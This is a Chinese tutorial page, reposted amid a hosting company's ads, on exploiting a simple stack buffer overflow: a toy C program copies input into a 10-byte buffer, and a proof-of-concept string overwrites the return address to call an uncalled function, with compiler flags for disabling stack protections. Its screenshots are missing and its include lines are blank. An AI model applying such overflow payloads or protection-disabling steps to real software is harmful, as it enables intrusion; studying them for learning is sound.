简单栈溢出利用-创新互联

#include
#include
void fun(char *name){
    char buf[10];
    strcpy(buf,name);
    printf("%s\n",buf);
}
void hack(){
    printf("flag\n");
}
int main(){
    char name[]="Alex@bbb";
    fun(name);
    return 0;
}

上面的程序是一个正常的C语言程序,但是main函数中没有调用hack()函数,下面我就演示下如何利用缓冲区溢出来执行hack函数的内容。

成都创新互联公司专注于网站建设,为客户提供网站设计制作、做网站、网页设计开发服务,多年建网站服务经验,各类网站都可以开发,品牌网站设计,公司官网,公司展示网站,网站设计,建网站费用,建网站多少钱,价格优惠,收费合理。

使用codeblocks编译并执行上述程序后,拖入od查看栈的变化情况,看看给变量name赋什么值的时候,会恰好覆盖掉call fun处的函数返回地址

简单栈溢出利用

F7跟进 F8 一句一句执行:

简单栈溢出利用

简单栈溢出利用

因此我们添加poc:

#include
#include
void fun(char *name){
    char buf[10];
    strcpy(buf,name);
    printf("%s\n",buf);
}
void hack(){
    printf("flag\n");
}
int main(){
    char name[]="Alex@bbbaaaaaaaaaaaaaa\x59\x13\x40\00"; //这里后边四个为hack()函数地址
    fun(name);
    return 0;
}

重新编译执行后,我们发现利用成功:

 简单栈溢出利用

在使用ubuntu复现栈溢出的时候需要关闭栈保护机制:

    使用gcc编译时全部关闭保护机制,参数-fno-stack-protector用来关闭gcc编译器gs验证码机制,

   -z execstack用来关闭ld链接器堆栈段不可执行机制。

这里有一个linux下64位的栈溢出过程。

https://www.secpulse.com/archives/32328.html

另外有需要云服务器可以了解下创新互联scvps.cn,海内外云服务器15元起步,三天无理由+7*72小时售后在线,公司持有idc许可证,提供“云服务器、裸金属服务器、高防服务器、香港服务器、美国服务器、虚拟主机、免备案服务器”等云主机租用服务以及企业上云的综合解决方案,具有“安全稳定、简单易用、服务可用性高、性价比高”等特点与优势,专为企业上云打造定制,能够满足用户丰富、多元化的应用场景需求。


网站题目:简单栈溢出利用-创新互联
浏览路径:http://lszwz.com/article/djopos.html

其他资讯

售后响应及时

7×24小时客服热线

数据备份

更安全、更高效、更稳定

价格公道精准

项目经理精准报价不弄虚作假

合作无风险

重合同讲信誉,无效全额退款